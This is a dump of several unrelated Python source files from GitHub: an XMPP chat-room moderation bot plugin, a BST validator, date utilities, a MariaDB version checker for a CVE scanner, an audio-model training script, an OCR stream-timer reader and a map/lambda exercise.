rules autokick is purified!'\n\t\t\tAKICK_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the list of akick!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\takreli = show_amuc(groupchat,'akick')\n\t\trng = range(len(akreli))\n\t\tnakreli = ['%s) %s' % (li+1, akreli[li][0]) for li in rng]\n\t\t\n\t\tif akreli:\n\t\t\trep = u'List of rules akick (total: ' + str(len(nakreli))+ '):\\n' + '\\n'.join(nakreli)\n\t\telse:\n\t\t\trep = u'List of rules akick is empty!'\n\t\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_amoderator(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal AMODER_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'amoderator',exp)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tAMODER_COMP_EXP[groupchat] = compile_re_patt(groupchat,'amoderator')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,moderator,AMODER_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\tamreli = show_amuc(groupchat,'amoderator')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(amreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong number of rules!')\n\t\t\treturn\n\t\t\n\t\tamucre = amreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'amoderator',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tAMODER_COMP_EXP[groupchat] = compile_re_patt(groupchat,'amoderator')\n\t\telse:\n\t\t\treply(type,source,u'Deleted!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'amoderator')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'List of rules amoderetor is purified!'\n\t\t\tAMODER_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the list amoderetor!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\tamreli = show_amuc(groupchat,'amoderator')\n\t\trng = range(len(amreli))\n\t\tnamreli = ['%s) %s' % (li+1, amreli[li][0]) for li in rng]\n\t\t\n\t\tif amreli:\n\t\t\trep = u'List of rules amoderator (total: ' + str(len(namreli))+ '):\\n' + '\\n'.join(namreli)\n\t\telse:\n\t\t\trep = u'List of rules amoderator is empty!'\t\n\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_avisitor(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal AVISITOR_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'avisitor',exp)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tAVISITOR_COMP_EXP[groupchat] = compile_re_patt(groupchat,'avisitor')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,visitor,AVISITOR_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\tavreli = show_amuc(groupchat,'avisitor')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(avreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong number of rules!')\n\t\t\treturn\n\t\t\n\t\tamucre = avreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'avisitor',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tAVISITOR_COMP_EXP[groupchat] = compile_re_patt(groupchat,'avisitor')\n\t\telse:\n\t\t\treply(type,source,u'Deleted!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'avisitor')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'List of rules avisitor is purified!'\n\t\t\tAVISITOR_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'Unable to clear the list avisitor!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\tavreli = show_amuc(groupchat,'avisitor')\n\t\trng = range(len(avreli))\n\t\tnavreli = ['%s) %s' % (li+1, avreli[li][0]) for li in rng]\n\t\t\n\t\tif avreli:\n\t\t\trep = u'List of rules avisitor (total: ' + str(len(navreli))+ '):\\n' + '\\n'.join(navreli)\n\t\telse:\n\t\t\trep = u'List of rules avisitor is empty empty!'\t\n\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_aban(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal ABAN_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'aban',exp,reason)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tABAN_COMP_EXP[groupchat] = compile_re_patt(groupchat,'aban')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,ban,ABAN_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Deleted!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\tabreli = show_amuc(groupchat,'aban')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(abreli) or renum <= 0:\n\t\t\treply(type,source,u'Wrong number of rules!')\n\t\t\treturn\n\t\t\n\t\tamucre = abreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'aban',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tABAN_COMP_EXP[groupchat] = compile_re_patt(groupchat,'aban')\n\t\telse:\n\t\t\treply(type,source,u'Deleted!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'aban')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'Unable to clear the list of avisitor!'\n\t\t\tABAN_COMP_EXP[groupchat] = r''\n\t\telse:\n\t\t\trep = u'List of avisitor cleared!'\n\t\t\n\t\treply(type,source,rep)\n\telse:\n\t\tabreli = show_amuc(groupchat,'aban')\n\t\trng = range(len(abreli))\n\t\tnabreli = ['%s) %s' % (li+1, abreli[li][0]) for li in rng]\n\t\t\n\t\tif abreli:\n\t\t\trep = u'List of rules aban (total: ' + str(len(nabreli))+ '):\\n' + '\\n'.join(nabreli)\n\t\telse:\n\t\t\trep = u'A list of rules is empty!'\t\n\t\t\n\t\tif type == 'public':\t\n\t\t\treply(type,source, u'Look in private!')\n\t\t\t\n\t\treply('private',source,rep)\n\ndef handler_set_subject(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tresp = set_subject(groupchat, parameters)\n\t\t\n\t\tif resp:\n\t\t\treply(type, source, u'Done!')\n\t\telse:\n\t\t\treply(type, source, u'Unable to change theme!')\n\telse:\n\t\treply(type, source, u'And, then?')\n\t\ndef handler_kick(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(kick,type,source,parameters)\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\ndef handler_ban(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(ban,type,source,parameters)\t\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\ndef handler_none(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(none,type,source,parameters)\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\ndef handler_member(type, source, parameters):\n\tgroupchat=source[1]\n\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\n\tif parameters:\n\t\tmuc_set_aff(member,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_admin(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(admin,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_owner(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(owner,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\ndef handler_moderator(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(moderator,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\ndef handler_visitor(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(visitor,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_participant(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_role(participant,type,source,parameters)\n\telse: \n\t\treply(type, source, u'And, who?')\n\t\ndef handler_unban(type, source, parameters):\n\tgroupchat=source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tif parameters:\n\t\tmuc_set_aff(none,type,source,parameters + '|unban')\n\telse:\n\t\treply(type, source, u'And, who?')\n\t\nregister_command_handler(handler_kick, 'kick', ['admin','all','*','muc'], 16, 'Kick a user!', 'kick ', ['kick guy', 'kick guy|Первый пошел!'])\nregister_command_handler(handler_ban, 'ban', ['admin','all','*','muc'], 20, 'Banned a nick or jid!', 'ban ', ['ban guy', 'ban guy|Пшел отседова!', 'ban guy@jsmart.web.id', 'ban guy@jsmart.web.id|Свободен!'])\nregister_command_handler(handler_visitor, 'visitor', ['admin','all','*','muc'], 16, 'Refuse a user right to speak!', 'visitor ', ['visitor guy'])\nregister_command_handler(handler_participant, 'participant', ['admin','all','*','muc'], 16, 'Returns the position taken by the participant in the original condition, ie participant!!', 'participant ', ['participant guy'])\nregister_command_handler(handler_unban, 'unban', ['admin','all','*','muc'], 20, 'Release an asshole JID out from quarantine!', 'unban ', ['unban guy@jsmart.web.id!'])\nregister_command_handler(handler_none, 'none', ['admin','all','*','muc'], 20, 'Change a user position to the lowest role!', 'none ', ['none guy'])\nregister_command_handler(handler_member, 'member', ['admin','all','*','muc'], 20, 'Change a user position to a permanent member!', 'member ', ['member guy', 'member guy|Congratulation, be a good member!'])\nregister_command_handler(handler_moderator, 'moderator', ['admin','all','*','muc'], 20, 'Increase the position of participant or member, ie to make the interim moderator!', 'moderator ', ['moderator guy'])\nregister_command_handler(handler_admin, 'admin', ['superadmin','all','*','muc'], 30, 'Change a user position to admin of conference and permanent moderator!', 'admin ', ['admin guy', 'admin guy|Congratulation, now you are admin!'])\nregister_command_handler(handler_owner, 'owner', ['superadmin','all','*','muc'], 30, 'Change a user position to Owner of conference and permanent moderator!', 'owner ', ['owner guy', 'owner guy|Congratulation, now you are owner!'])\nregister_command_handler(handler_set_subject, 'set_subject', ['admin','all','*','muc'], 16, 'Sets the subject (topic) in the conference!', 'set_subject ', ['set_subject Welcome!'])\nregister_command_handler(handler_akick, 'akick', ['admin','all','*','amuc'], 20, 'Adds a rule to the list autokick, can be any word or regular expression. without parameters shows list of rules. When you specify a negative number removes the rule number after the \"-\" from the list of rules. When you specify \"-\" without number clears the list of rules.', 'akick [|reason]', [r'akick .*@jabber\\.ru',r'akick guy',r'akick .*@jabber\\..* | you are not welcome here!',r'akick -3',r'akick -',r'akick'])\nregister_command_handler(handler_amoderator, 'amoderator', ['admin','all','*','amuc'], 20, 'Adds a rule to the list automoderator, can be any word or regular expression. Without arguments displays list of rules. When you specify a negative number removes the rule with the number after \"-\" from the list of rules. When you specify \"-\" without a number of clears the list of rules.', 'amoderator ', [r'amoderator .*@jabber\\.ru',r'amoderator guy',r'amoderator -3',r'amoderator -',r'amoderator'])\nregister_command_handler(handler_avisitor, 'avisitor', ['admin','all','*','amuc'], 20, 'Adds a rule to the list avisitor, can be any word or regular expression. without parameters shows list of rules. When you specify \"-\" without a number of clears the list of rules. When you specify a negative number removes the rule with the number after \"-\" from the list of rules.', 'avisitor ', [r'avisitor .*@jabber\\.ru',r'avisitor guy',r'avisitor -3',r'avisitor -',r'avisitor'])\nregister_command_handler(handler_aban, 'aban', ['admin','all','*','amuc'], 20, 'Adds a rule to the list of aban, can be any word as well as regular expression. Without arguments displays list of rules. When you specify a negative number removes the rule with the number after \"-\" from the list of rules. When you specify \"-\" without a number of clears the list of rules.', 'aban ', [r'aban .*@jabber\\.ru',r'aban guy',r'aban guy | you are not welcome here!',r'aban -3',r'aban -',r'aban'])\n\nregister_stage1_init(get_amuc_state)\nregister_join_handler(handler_amuc_join)\nregister_presence_handler(handler_amuc_presence)","repo_name":"XtremeTeam/Lucy-bot","sub_path":"brain/plugins/muc.py","file_name":"muc.py","file_ext":"py","file_size_in_byte":29391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"5874888269","text":"import collections\n\ndef checkBST(tree, curMin=float('-inf'), curMax=float('inf')):\n if not tree:\n return True\n elif not curMin <= tree.data <= curMax:\n return False\n else:\n return checkBST(tree.left, curMin, tree.data) and checkBST(tree.right, tree.data, curMax)\n\ndef checkBSTQueue(tree):\n QueueEntry = collections.namedtuple('QueueEntry', ('node', 'curMin', 'curMax'))\n\n bfsQueue = collections.deque([QueueEntry(tree, float('-inf'), float('inf'))])\n\n while bfsQueue:\n cur = bfsQueue.popleft()\n if cur:\n if not cur.curMin <= cur.node.data <= cur.curMax:\n return False\n bfsQueue += [QueueEntry(cur.node.left, cur.curMin, cur.node.data),\n QueueEntry(cur.node.right, cur.node.data, cur.curMax)]\n return True\n","repo_name":"b93901190/PEI_Python","sub_path":"ch14/checkBST.py","file_name":"checkBST.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14824397303","text":"\n\n\n#计算时间差\nimport datetime\nimport logging\nlogger = logging.getLogger('django')\noneDaySeconds = 86400\n#获取时间差\ndef get_date_diff_second(start_str, end_str):\n start = datetime.datetime.strptime(start_str, '%Y-%m-%d %H:%M:%S')\n end = datetime.datetime.strptime(end_str, '%Y-%m-%d %H:%M:%S')\n diff = end - start\n # 相差天数\n days = diff.days\n print('相差天数:', diff.days)\n # 相差秒数\n seconds = diff.seconds\n count_seconds = seconds\n if days > 0:\n count_seconds = days * oneDaySeconds + seconds\n print('相差秒数:', count_seconds)\n # 相差微秒数\n # print('相差微秒数:', diff.microseconds)\n return count_seconds\n\n\ndef get_time(days=0,seconds=0,hours=0,weeks=0):\n now_time = datetime.datetime.now()\n result_time = (now_time + datetime.timedelta(days=days,hours=hours,weeks=weeks,seconds=seconds)).strftime('%Y-%m-%d %H:%M:%S')\n logger.info(\"得到时间:%s\" % result_time)\n print(\"得到时间:%s\" % result_time)\n return result_time\n\n\nif __name__ == '__main__':\n result = get_date_diff_second('2018-11-21 00:00:00','2018-11-21 23:59:59')\n print(result)\n # get_time(days=-1)","repo_name":"github4n/AlgorithmServer","sub_path":"utils/timeUtils.py","file_name":"timeUtils.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3202921963","text":"import time\n\n\nclass TimePrinter:\n \"\"\"Regularly print the current date/time and the passed duration in hours.\"\"\"\n\n def __init__(self, interval_s: float = 3600.0):\n \"\"\"Initialise.\n\n Args:\n interval_s: Print interval in seconds.\n \"\"\"\n #: Print interval in seconds\n self.interval_s = interval_s\n #: Timestamp when the printer started\n self.start_time = time.time()\n self.start_time_str = time.strftime(\"%F %H:%M\")\n\n self._last_time_print = 0.0\n\n def update(self):\n \"\"\"Print time if the interval_s has passed since the last call.\"\"\"\n now = time.time()\n if now - self._last_time_print > self.interval_s:\n time_str = time.strftime(\"%F %H:%M\")\n duration_h = round((now - self.start_time) / 3600)\n print(\n \"{} ({} h since {})\".format(\n time_str, duration_h, self.start_time_str\n )\n )\n self._last_time_print = now\n","repo_name":"ChrisAFRcrew/robot_fingers","sub_path":"python/robot_fingers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"71092908271","text":"import cv2\nimport pytesseract\nimport numpy as np\nimport re\n\n#set the tessearact path\npytesseract.pytesseract.tesseract_cmd = './.apt/usr/bin/tesseract'\n\ndef get_timer(img_path):\n \"\"\"\n Looks at a screenshot of the stream and finds the timer\n Uses openCV to make the image easier for tesseract to interpret\n Tesseract finds the times, returns the timer in a list [minutes, seconds]\n \"\"\"\n\n img = cv2.imread(img_path)\n\n #Crop the image to only look at timer\n img = img[340:340+50, 1100:1100+130]\n\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n gray, img_bin = cv2.threshold(gray,128,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n gray = cv2.bitwise_not(img_bin)\n\n kernel = np.ones((2, 1), np.uint8)\n img = cv2.erode(gray, kernel, iterations=1)\n img = cv2.dilate(img, kernel, iterations=1)\n\n time_string = pytesseract.image_to_string(img, config='--psm 7 -c tessedit_char_whitelist=0123456789: ').replace('\\f', '').replace('\\n', '')\n time_list = re.split(':', time_string)\n \n #if time contains anything other than numbers, return empty list\n for time in time_list:\n if not time.isnumeric():\n return []\n\n #timer is only showing seconds, insert 0 minutes at index 0\n if len(time_list) == 1:\n time_list.insert(0,0)\n\n return time_list\n\n\ndef check_dragon(image_path):\n \"\"\"\n Returns true if Forsen is fighting the dragon\n Looks for 'Ender' in 'Ender Dragon' on top of the screen\n \"\"\"\n\n #Crop the image to only look at top text\n img = cv2.imread(image_path)\n img = img[0:0+24, 560:560+160]\n\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n gray, img_bin = cv2.threshold(gray,128,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n gray = cv2.bitwise_not(img_bin)\n\n kernel = np.ones((2, 1), np.uint8)\n img = cv2.erode(gray, kernel, iterations=1)\n img = cv2.dilate(img, kernel, iterations=1)\n\n dragon_string = pytesseract.image_to_string(img, config='--psm 7').replace('\\f', '').replace('\\n', '')\n return 'Ender' in dragon_string\n\n\ndef run_ongoing(previous_time, current_time):\n \"\"\"\n Returns true if it has been less than 15 minutes since a tweet\n \"\"\"\n\n return ((current_time - previous_time) < 900)\n\n\ndef get_seconds(time_list):\n \"\"\"\n Takes an array of a timer [minutes, seconds] and returns the total amount of seconds\n \"\"\"\n\n minutes = int(time_list[0])\n seconds = int(time_list[1])\n\n return (minutes*60 + seconds)\n\n\ndef time_passed(time_array, amount):\n \"\"\"\n Checks if a timer has passed a certain amount of time\n \"\"\"\n\n time = get_seconds(time_array)\n return time > get_seconds(amount)\n","repo_name":"erikwessman/forsen-bot","sub_path":"src/run_timer.py","file_name":"run_timer.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15381364498","text":"from cve_bin_tool.checkers import Checker\n\n\nclass MariadbChecker(Checker):\n CONTAINS_PATTERNS = [\n r\"Oracle, MariaDB Corporation Ab and others.\",\n r\"General information about MariaDB can be found at\\nhttp://mariadb.org\",\n r\"Welcome to the MariaDB monitor.\",\n r\"MariaDB virtual IO plugin for socket communication\",\n ]\n FILENAME_PATTERNS = [\n r\"mariadb\",\n r\"mariadb-client\",\n r\"mariadb_config\",\n r\"mariadb-client-core\",\n r\"mariadb-test\",\n r\"mariadb-test-data\",\n r\"odbc-mariadb\",\n r\"libmariadb-dev\",\n r\"libmariadb-dev-compat\",\n r\"libmariadb-java\",\n r\"libmariadbclient-dev\",\n r\"mariadb-backup\",\n r\"mariadb-plugin\",\n ]\n VERSION_PATTERNS = [\n r\"([0-9]+\\.[0-9]+\\.[0-9]+)-MariaDB\",\n r\"([0-9]+\\.[0-9]+\\.[0-9]+)\\r?\\nMariaDB\",\n ]\n VENDOR_PRODUCT = [(\"mariadb\", \"mariadb\")]\n","repo_name":"intel/cve-bin-tool","sub_path":"cve_bin_tool/checkers/mariadb.py","file_name":"mariadb.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":950,"dataset":"github-code","pt":"38"} +{"seq_id":"5890380065","text":"import tensorflow as tf\nimport numpy as np\nimport random\nimport os\nimport pprint\nimport models.autoencoder as ae\nimport models.fixed_size_autoencoder as conv_ae\nimport models.gan as gan\nimport models.dcgan_2d as dcgan_2d\nimport models.conv_autoencoder_2d as conv_ae_2d\n\nflags = tf.app.flags\n\nflags.DEFINE_string('experiment_name', 'first_run', 'Name of the experiment being run')\nflags.DEFINE_string('data_dir', None, \"directory where data is stored\")\nflags.DEFINE_string('checkpoint_dir', './saved_checkpoints/', 'Checkpoint directory')\nflags.DEFINE_integer('batch_size', 100, \"The batch size\")\nflags.DEFINE_integer('fixed_len_batch_size', 10, \"The batch size\")\nflags.DEFINE_float('learning_rate', 1e-3, \"The learning rate\")\nflags.DEFINE_float('gpu_usage', 0.96, \"The gpu usage as a percentage\")\nflags.DEFINE_integer('num_epochs', 20, \"The number of epochs to train\")\nflags.DEFINE_boolean(\"recurrent_ae\", False, \"True to use the recurrent AE\")\nflags.DEFINE_boolean(\"gan\", False, \"True to use the gan\")\nflags.DEFINE_boolean(\"conv_ae\", False, \"True to use the conv_ae\")\nflags.DEFINE_string('tag', None, \"Optional tag, attached to checkpoints so runs with different tags have different checkpoints\")\nflags.DEFINE_string(\"best_model_tag\", \"max_val_acc_model\", \"The tag that identifies the directory which the best model is saved to (max_val_acc_model)\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n pprint.PrettyPrinter().pprint(flags.FLAGS.__flags)\n\n assert FLAGS.data_dir is not None\n FLAG_checkpoint_dir = os.path.join(FLAGS.checkpoint_dir, FLAGS.experiment_name)\n FLAG_log_dir = os.path.join(FLAG_checkpoint_dir, \"logs\", FLAGS.experiment_name)\n\n FLAG_best_model_tag = FLAGS.best_model_tag\n if FLAGS.tag is not None:\n FLAG_best_model_tag = FLAGS.tag + \"_\" + FLAGS.best_model_tag\n \n suffix = \"2d_conv_ae\"\n conv_ae_2d.train_conv_ae(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \n \"\"\"\n suffix = \"_2d_dcgan\"\n dcgan_2d.train_gan(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \"\"\"\n \n if FLAGS.recurrent_ae:\n suffix = \"_ae\"\n ae.train_seq2_seq_ae(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \n if FLAGS.conv_ae:\n suffix = \"_conv_ae\"\n conv_ae.train_conv_ae(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n \n if FLAGS.gan:\n suffix = \"_gan\"\n gan.train_gan(FLAGS.data_dir, FLAGS.experiment_name + suffix, \\\n FLAG_checkpoint_dir + suffix, FLAG_log_dir + suffix, FLAGS.fixed_len_batch_size, \\\n FLAGS.learning_rate, FLAGS.num_epochs, FLAGS.gpu_usage, \\\n FLAGS.tag, FLAG_best_model_tag)\n\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n\n\n\n\n\n\n","repo_name":"punkideas/audio-style-transfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30093224571","text":"import unittest\n\n# Lets build on what we did last week in discussion section :-)\nstarter = [1, 3, 6, 11, 5, 8, 7, 2, 9]\n\n# ---- Task 1a ----\n# Write a funtion squareFunc takes a number as a paramter and returns the square of the number\n# ----- Your Code Starts Here -----\ndef squareFunc(x):\n\treturn x*x\n\n\n# ---- Task 1b -----\n# Map function takes 2 parameters - a function object, and a sequence\n# i.e. it is invoked like this -> map(aFunction, aSequence)\n# Use squareFunc as first parameter in map function, and the list starter as second parameter\n# Store the result returned by map function in a variable square_fn\n# ----- Your Code Starts Here -----\nsquare_fn = map(squareFunc,starter)\nprint (type(square_fn))\n\n\n# # ---- Task 1c ----\n# # Write a lambda function that does the same thing as squareFunc\n# # and use the lambda function in place of squareFunc.\n# # Store the result returned by map function in a variable square_la\n# # ----- Your Code Starts Here -----\nsquare_la = map(lambda x: x*x,starter)\nprint (square_la)\n\nfor i in range(len(starter)):\n\tprint(next(square_fn))\nresultlist = list(square_fn)\n\nprint(resultlist)\n\n\n# # ---- Task 1d ----\n# # Cast square_la to a list square_lst\n# # ----- Your Code Starts Here -----\nsquare_lst = list(square_la)\n\n\n# # ---- Task 2a ----\n# # Since map function works on sequences, lets try it on a string.\n# # First, write a function flippingCase which takes a character\n# # and returns it in uppercase if the character is lowercase\n# # else returns it in lowercase if the character is uppercase\n# # Hint : You can use str.isUpper(), str.isLower(), str.upper(), str.lower() if needed\n# # ----- Your Code Starts Here -----\ndef flippingCase(x):\n\tif x.isupper():\n\t\ta = x.lower()\n\telse:\n\t\ta = x.upper()\n\treturn a\t\t\n\n# # ---- Task 2b ----\n# # Use the function flippingCase and the string 'I Am Camel Case' as parameters for map function\n# # Store the result in variable confusedCase\n# # ----- Your Code Starts Here -----\n# confusedCase =\nconfusedCase = map(flippingCase,'I Am Camel Case')\n\n# # ---- Task 2c ----\n# # Cast 